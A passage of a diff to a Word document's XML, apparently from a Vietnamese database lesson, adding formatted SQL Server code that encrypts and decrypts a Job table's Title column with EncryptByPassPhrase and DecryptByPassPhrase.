+        <w:t>EncryptByPassPhrase</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>'123'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Title</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="FF00FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>UPDATE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Job </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>SET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Title </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="FF00FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>CONVERT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>NVARCHAR</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>100</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>),</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="FF00FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>DecryptByPassPhrase</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>'123'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Title</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>))</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
